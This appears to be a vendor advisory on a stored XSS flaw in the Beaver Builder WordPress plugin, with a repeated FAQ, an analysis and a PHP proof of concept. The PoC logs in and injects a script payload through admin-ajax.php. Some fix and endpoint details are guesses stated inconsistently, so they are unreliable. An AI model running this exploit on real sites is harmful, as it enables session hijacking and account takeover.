What is CVE-2026-1231?

CVE-2026-1231 is a Stored Cross-Site Scripting (XSS) vulnerability in the Beaver Builder Page Builder plugin for WordPress. It allows authenticated users with Custom-level access to inject arbitrary JavaScript into pages, which can execute in the browsers of users viewing those pages.

How does the vulnerability work?

The vulnerability arises from missing capability checks and insufficient input sanitization in the `save_global_settings()` function. Attackers can exploit this by sending a specially crafted request to save malicious JavaScript in the Global Settings, which is then executed when other users access the affected pages.

Who is affected by this vulnerability?

Any WordPress site using Beaver Builder Page Builder versions up to and including 2.10.0.5 is affected. Specifically, users with Custom+ access who have been granted Beaver Builder permissions can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Beaver Builder plugin in use. If it is 2.10.0.5 or earlier, your site is at risk. Additionally, review user roles to see if any users have Custom+ access.

What is the severity level of this vulnerability?

The vulnerability has a Medium severity rating with a CVSS score of 6.4. This indicates a moderate risk, as it requires authenticated access to exploit, but can lead to significant client-side attacks.

What practical risks does this vulnerability pose?

Exploitation can lead to session hijacking, account takeover, or defacement of the site. Malicious scripts can execute in the browsers of users visiting compromised pages, potentially affecting their interactions with the site.

How can I fix or mitigate this issue?

The best way to mitigate this vulnerability is to update the Beaver Builder plugin to version 2.10.0.6 or later, which includes necessary security patches. Additionally, review user roles and permissions to limit access to the Global Settings.

What changes were made in the patched version?

The patched version 2.10.0.6 implements proper capability checks in the `save_global_settings()` function and enhances input sanitization for the `js` parameter. It also ensures that output is properly escaped to prevent script execution.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can use valid WordPress credentials to send a request to the vulnerable AJAX endpoint. It shows how to inject a simple JavaScript payload, demonstrating the potential for XSS attacks.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all plugins are regularly updated and review their security practices. Implement strict user role management and conduct regular security audits of your WordPress site.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Beaver Builder plugin until a safe version can be installed. Additionally, limit access to users with Custom+ roles to minimize the risk of exploitation.

Where can I find more information about this vulnerability?

For more detailed information, refer to the official CVE database or security advisories from WordPress security experts. Community forums and security blogs can also provide insights and updates regarding this vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1231: Beaver Builder Page Builder – Drag and Drop Website Builder <= 2.10.0.5 – Authenticated (Custom+) Missing Authorization to Stored Cross-Site Scripting via Global Settings (beaver-builder-lite-version)

CVE ID CVE-2026-1231

Plugin beaver-builder-lite-version

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.10.0.5

Patched Version —

Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1231 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Beaver Builder Page Builder plugin for WordPress, affecting versions up to and including 2.10.0.5. The issue resides in the plugin’s Global Settings functionality, allowing attackers with ‘Custom+’ level access and Beaver Builder permissions to inject arbitrary JavaScript. The injected scripts execute for any user viewing a compromised page, leading to a client-side security breach.

Atomic Edge research identifies two root causes based on the CVE description and CWE-79 classification. The first confirmed issue is a missing capability check in the `save_global_settings()` function. This allows users with lower-level ‘Custom+’ roles to call a function intended for higher-privileged administrators. The second inferred issue is insufficient input sanitization and output escaping on the `js` Global Settings parameter. The plugin likely fails to properly sanitize user input before storing it in the database and does not escape it upon output in a page context.

Exploitation requires an authenticated attacker with ‘Custom+’ access and Beaver Builder permissions granted by an administrator. The attack vector is likely a WordPress AJAX handler or a REST API endpoint that processes the `save_global_settings` action. The attacker would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter like `fl_ajax_save_global_settings`. The payload would be placed in a parameter named `js` or within a `settings` array containing a `js` key. A typical payload would be `alert(document.domain)` or a more malicious script designed to steal session cookies.

Effective remediation requires addressing both security flaws. The patched version 2.10.0.6 likely adds a proper capability check, such as `current_user_can(‘manage_options’)`, to the `save_global_settings()` function. The fix also must implement robust input sanitization using functions like `wp_kses_post()` for the `js` parameter before storage. Additionally, the plugin must apply proper context-aware output escaping, such as `esc_js()` or `wp_json_encode()`, when rendering the stored JavaScript on the front end.

Successful exploitation leads to stored XSS attacks. Injected scripts execute in the browser of any user visiting a page where the malicious global setting is loaded. This can result in session hijacking, account takeover, defacement, or redirection to malicious sites. Attackers can perform actions on behalf of victims, potentially escalating privileges if an administrator views the compromised page. The scope is changed (S:C in CVSS), meaning the impact can spread to other site components beyond the plugin itself.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1231 - Beaver Builder Page Builder – Drag and Drop Website Builder <= 2.10.0.5 - Authenticated (Custom+) Missing Authorization to Stored Cross-Site Scripting via Global Settings
<?php
/**
 * Proof of Concept for CVE-2026-1231.
 * This script demonstrates the authenticated Stored XSS vulnerability in Beaver Builder Lite <= 2.10.0.5.
 * Assumptions based on metadata:
 * 1. The vulnerable endpoint is `/wp-admin/admin-ajax.php`.
 * 2. The AJAX action is related to saving global settings, likely `fl_ajax_save_global_settings`.
 * 3. The malicious payload is delivered via a parameter named `js`.
 * 4. The attacker has valid WordPress credentials with 'Custom+' role and Beaver Builder access.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$username = 'attacker_user'; // CHANGE THIS
$password = 'attacker_password'; // CHANGE THIS

// Payload to inject. This is a simple alert for demonstration.
// In a real attack, this could be script to steal cookies or session tokens.
$malicious_js_payload = '</script><script>alert("Atomic Edge XSS - "+document.domain);</script>';

// Initialize cURL session for WordPress login to obtain authentication cookies.
$ch = curl_init();
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);

// Prepare login POST data.
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
];
$login_query = http_build_query($login_fields);

curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $login_query,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => true, // We need the response headers to capture cookies.
    CURLOPT_COOKIEJAR => 'cookies.txt', // Store cookies for subsequent requests.
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_USERAGENT => 'Atomic Edge PoC Client/1.0'
]);

$login_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code !== 200) {
    die("Login request failed with HTTP code: $http_code");
}

// Check for a successful login indicator in the response body.
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login likely failed. Check credentials.');
}

echo "[*] Successfully logged in as $usernamen";

// Now send the malicious AJAX request to exploit the missing authorization and sanitization.
// The action name is inferred from common Beaver Builder patterns and the function name.
$exploit_action = 'fl_ajax_save_global_settings';

// Build the POST data for the global settings save.
// The `js` parameter is the vulnerable field.
$exploit_fields = [
    'action' => $exploit_action,
    'js' => $malicious_js_payload,
    // Nonce may be required but is often missing in vulnerable implementations.
    // The description states missing capability check, implying nonce may also be absent or bypassable.
    // We assume the request works without a nonce due to the vulnerability.
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => $exploit_fields,
    CURLOPT_HEADER => false, // We don't need headers for this response.
    CURLOPT_RETURNTRANSFER => true,
]);

$exploit_response = curl_exec($ch);
$exploit_http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($exploit_http_code === 200) {
    echo "[*] Exploit request sent. HTTP 200 received.n";
    echo "[*] Response: $exploit_responsen";
    echo "[*] The malicious JavaScript payload should now be stored in the global settings.n";
    echo "[*] Visit any page built with Beaver Builder to trigger the XSS.n";
} else {
    echo "[!] Exploit request failed with HTTP code: $exploit_http_coden";
    echo "[!] The endpoint or action name may be incorrect, or the plugin is patched.n";
}

// Clean up the cookie file.
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>

Frequently Asked Questions

What is CVE-2026-1231?
Overview of the vulnerability
CVE-2026-1231 is a Stored Cross-Site Scripting (XSS) vulnerability in the Beaver Builder Page Builder plugin for WordPress. It allows authenticated users with Custom-level access to inject arbitrary JavaScript into pages, which can execute in the browsers of users viewing those pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing capability checks and insufficient input sanitization in the `save_global_settings()` function. Attackers can exploit this by sending a specially crafted request to save malicious JavaScript in the Global Settings, which is then executed when other users access the affected pages.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using Beaver Builder Page Builder versions up to and including 2.10.0.5 is affected. Specifically, users with Custom+ access who have been granted Beaver Builder permissions can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Beaver Builder plugin in use. If it is 2.10.0.5 or earlier, your site is at risk. Additionally, review user roles to see if any users have Custom+ access.
What is the severity level of this vulnerability?
Understanding the risk
The vulnerability has a Medium severity rating with a CVSS score of 6.4. This indicates a moderate risk, as it requires authenticated access to exploit, but can lead to significant client-side attacks.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
Exploitation can lead to session hijacking, account takeover, or defacement of the site. Malicious scripts can execute in the browsers of users visiting compromised pages, potentially affecting their interactions with the site.
How can I fix or mitigate this issue?
Recommended actions
The best way to mitigate this vulnerability is to update the Beaver Builder plugin to version 2.10.0.6 or later, which includes necessary security patches. Additionally, review user roles and permissions to limit access to the Global Settings.
What changes were made in the patched version?
Details of the fix
The patched version 2.10.0.6 implements proper capability checks in the `save_global_settings()` function and enhances input sanitization for the `js` parameter. It also ensures that output is properly escaped to prevent script execution.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can use valid WordPress credentials to send a request to the vulnerable AJAX endpoint. It shows how to inject a simple JavaScript payload, demonstrating the potential for XSS attacks.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure that all plugins are regularly updated and review their security practices. Implement strict user role management and conduct regular security audits of your WordPress site.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If an immediate update is not possible, consider disabling the Beaver Builder plugin until a safe version can be installed. Additionally, limit access to users with Custom+ roles to minimize the risk of exploitation.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information, refer to the official CVE database or security advisories from WordPress security experts. Community forums and security blogs can also provide insights and updates regarding this vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations